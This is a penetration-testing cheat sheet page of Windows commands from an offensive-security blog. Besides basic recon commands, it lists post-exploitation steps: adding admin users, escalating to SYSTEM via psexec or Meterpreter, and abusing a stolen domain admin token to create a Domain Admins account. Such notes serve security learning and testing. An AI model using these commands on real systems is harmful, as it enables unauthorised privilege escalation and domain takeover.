NetSec

Ramblings of a NetSec addict

  • Ramblings
    • OSCP Review
    • OSCE Review
    • So you want to be a Hacker?
    • InfoSec Topics
  • Tutorials
    • Simple Buffer Overflows
    • Converting Metasploit Module to Stand Alone
  • Hacking Snippets
    • Basic Information
      • Spawning a TTY Shell
      • Finding Public Exploits
    • Metasploit
      • Creating Metasploit Payloads
    • Passwords
      • Cracking Network Passwords (Hydra)
      • Generating Wordlists
      • Identifying Hashes (Hash Identifier)
      • Cracking Hashes (oclHashcat)
      • Obtaining Windows Passwords
    • Privilege Escalation
      • Linux Privilege Escalation Scripts
    • Port Redirection
      • Port Redirection with Rinetd
      • Dynamic Port Forwarding (SSH)
      • Remote Port Forwarding (SSH)
      • Local Port Forwarding (SSH)
      • Port Forwarding with Metasploit
    • Tools
      • Netcat
  • OS Tips
    • Linux
      • Simple Linux Commands
    • Windows
      • Simple Windows Commands
    • Programs
      • Remote Desktop (rdesktop)
      • Fixing Metasploit Slow Search
      • Encoding / Decoding Base64
  • Programming
    • Python Snippets
      • Multi-Threaded Brute Forcer
      • Writing Shellcode to a File
    • Programs
  • Peach Pits
    • FTP
      • Fuzz Username / Password
      • Fuzz FTP Commands
  • Vulnerable VMs
    • Walkthroughs
      • pWnOS 2.0

Simple Windows Commands

Peleus

Check Who You Are

echo %USERDOMAIN%\%USERNAME
whoami

echo %USERDOMAIN%\%USERNAME whoami

Check Windows Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Add a User

net user <username> <password> /add</password></username>

net user <username> <password> /add</password></username>

Add a User to the Administrators Group

net localgroup administrators <username> /add

net localgroup administrators <username> /add

Getting from Administrator to System

psexec -s cmd.exe

psexec -s cmd.exe

Getting system with Meterpreter

getsystem

getsystem

(from the meterpreter shell)

Changing a Users Password

net user <username> <password>

net user <username> <password>

View Domain Groups

net group /domain

net group /domain

View Members of Domain Group

net group /domain <Group Name>

net group /domain <Group Name>

Add Member with Domain Admin
This attack is on the assumption you have obtained a meterpreter shell on a system and you’re lucky enough to have found a domain admin’s token.

impersonate_token <Domain>\\<Username>     # The Domain Admin's Username
add_user <Username> <password> -h <Host IP of Domain Controller>    # An attacker defined Username
add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller>

impersonate_token <Domain>\\<Username> # The Domain Admin's Username add_user <Username> <password> -h <Host IP of Domain Controller> # An attacker defined Username add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller>

You should now have an account on the Domain Controller with Domain Admin privileges.

Filed Under: Windows Tagged With: basic, windows, windows commands

Copyright © 2022 · Genesis Sample on Genesis Framework · WordPress · Log in